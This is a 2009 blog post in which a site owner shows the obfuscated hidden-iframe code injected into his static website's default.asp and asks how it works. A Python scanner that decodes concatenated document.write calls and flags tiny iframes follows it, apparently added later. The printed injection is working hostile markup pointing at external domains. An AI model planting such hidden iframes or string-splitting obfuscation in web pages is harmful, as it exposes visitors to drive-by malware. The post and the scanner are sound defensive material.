Wednesday, October 21, 2009

How I got rid of malware "attack site" code


My website http://www.arthurhu.com/ is hosted on oneandone, and I upload to it using FTP. If you use Firefox or Chrome, going to the site will show you an "attack website" warning. Nobody ever got hurt as far as I know, but it scares people away.

Somehow, somebody stuck this code in default.asp:

(iframe height="1" src="http://updeit.com/" width="1"](/iframe](script]


document.write("("+ "iframe"+ " "+ "s"+ "rc="+ "h"+ "t"+ "t"+ "p"+ ":"+ "/"+ "/"+ "ze"+ "n"+ "i"+ "t"+ "ch"+ "ampi"+ "on."+ "c"+ "n/n"+ "ic/"+ "main"+ ".ph"+ "p "+ "hei"+ "gh"+ "t"+ "="+ "2"+ " w"+ "idth=1]"+ "(/i"+ "f"+ "rame"+ "]");

(/script](script]

document.write("(iframe"+ " s"+ "rc='htt"+ "p://"+ "z"+ "enit"+ "champion"+ ".c"+ "n/nic/"+ "main.p"+ "hp' height="+ "2 width=1](/iframe]");

(/script](script]

document.write("(" +"i"+ "fr"+ "ame"+ " s" +"r"+"c"+"=h"+ "t"+"t" +"p"+ ":" +"//vi"+ "p"+"pr"+ "o"+"j"+ "e" +"c" +"t"+"s."+ "c" +"n" +"/ "+"h" +"ei"+"g"+ "h"+ "t"+ "=" +"1"+ " wi"+ "d" +"th=" +"1](/i" +"f"+ "ra"+"m"+"e]");

(/script](script]

document.write("(i"+ "f"+"rame "+"s" +"rc=ht"+ "t"+"p:"+ "//"+"u"+"p" +"da"+"tedat"+ "e.cn/ "+ "hei" +"g"+"ht" +"="+"1" +" " +"width=1]"+ "(" +"/" +"if"+"rame]");

(/script](script]

document.write("(if"+"r" +"a" +"m" +"e" +" "+"s"+"rc="+"ht"+"tp:/" +"/"+"u" +"p" +"d" +"a"+"t" +"ed" +"at" +"e." +"cn" +"/ " +"h" +"eig" +"ht"+"=" +"1 " +"w" +"idth" +"=" +"1]" +"(/if"+"ra" +"me"+"]");

(/script](br /]



Looks like it wants to create something pointing at http://updatedate.cn/ (DON'T CLICK THERE!).

I used CuteFTP Pro 8.0 to look at the directory and found a few files modified in Aug 2009, while most of the files haven't changed since the 1990s. Most of the files with new dates had this code, or something similar to it. Tech support said that usually it's code injected through a form or database, but what I use is just static hand-coded HTML. Hopefully, changing the FTP password will fix the problem.

Does anybody else have ideas on how to keep a website clear of this stuff? Does anybody know how this malware is supposed to work, based on this injected code?
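One way to sweep a site's own files for this kind of injection, added here as an example and not code from the post: it rebuilds each concatenated document.write("a"+ "b"+ ...) call into the markup it would emit at render time and flags any iframe sized a pixel or two, which is the shape of every line in the block above. SAMPLE_HTML and its domains are constructed placeholders (the post prints "(" and "]" where a real file has "<" and ">").

```python
import re

# Constructed sample in the shape of the injected block shown in the post. The post
# prints "(" and "]" where the real file has "<" and ">"; domains here are placeholders.
SAMPLE_HTML = """<html><body><p>Welcome to my page</p>
<iframe height="1" src="http://bad-one.example/" width="1"></iframe><script>
document.write("<"+ "iframe"+ " "+ "s"+ "rc="+ "h"+ "t"+ "t"+ "p"+ ":"+ "/"+ "/"+ "bad-"+ "two."+ "exam"+ "ple/n"+ "ic/"+ "main"+ ".ph"+ "p "+ "hei"+ "gh"+ "t"+ "="+ "2"+ " w"+ "idth=1>"+ "</i"+ "f"+ "rame"+ ">");
</script><script>
document.write("<iframe"+ " s"+ "rc='htt"+ "p://"+ "bad-three.example/' height="+ "2 width=1></iframe>");
</script>
<iframe src="http://video.example/embed" width="640" height="360"></iframe>
</body></html>"""

WRITE_RE = re.compile(r'document\.write\(\s*((?:"[^"]*"\s*\+\s*)*"[^"]*")\s*\)')
FRAG_RE = re.compile(r'"([^"]*)"')
SCRIPT_RE = re.compile(r'<script\b.*?</script>', re.I | re.S)
IFRAME_RE = re.compile(r'<iframe\b([^>]*)>', re.I)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def decode_writes(html):
    """Rebuild each document.write("a"+ "b"+ ...) call into the markup it would emit."""
    return ["".join(FRAG_RE.findall(call)) for call in WRITE_RE.findall(html)]


def suspicious_iframes(html, max_px=2):
    """Return src URLs of iframes no larger than max_px, both those written plainly
    and those hidden in concatenated document.write calls. A 1x1 or 2x1 iframe that
    points off-site has no legitimate use on a static page, so size is the tell."""
    found = []
    # Scan the static markup (scripts removed so fragments are not half-matched),
    # then the markup each document.write would produce at render time.
    for markup in [SCRIPT_RE.sub("", html)] + decode_writes(html):
        for attrs in IFRAME_RE.findall(markup):
            a = {k.lower(): (q1 or q2 or bare) for k, q1, q2, bare in ATTR_RE.findall(attrs)}
            try:
                tiny = int(a.get("height", 9999)) <= max_px or int(a.get("width", 9999)) <= max_px
            except ValueError:
                tiny = False
            if tiny and "src" in a and a["src"] not in found:
                found.append(a["src"])
    return found


if __name__ == "__main__":
    for url in suspicious_iframes(SAMPLE_HTML):
        print("hidden iframe ->", url.replace("http", "hxxp"))  # defanged for the log
```

Run it over every .html/.asp file in the web root and compare the hits against the file dates; a static site should produce no hits at all.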
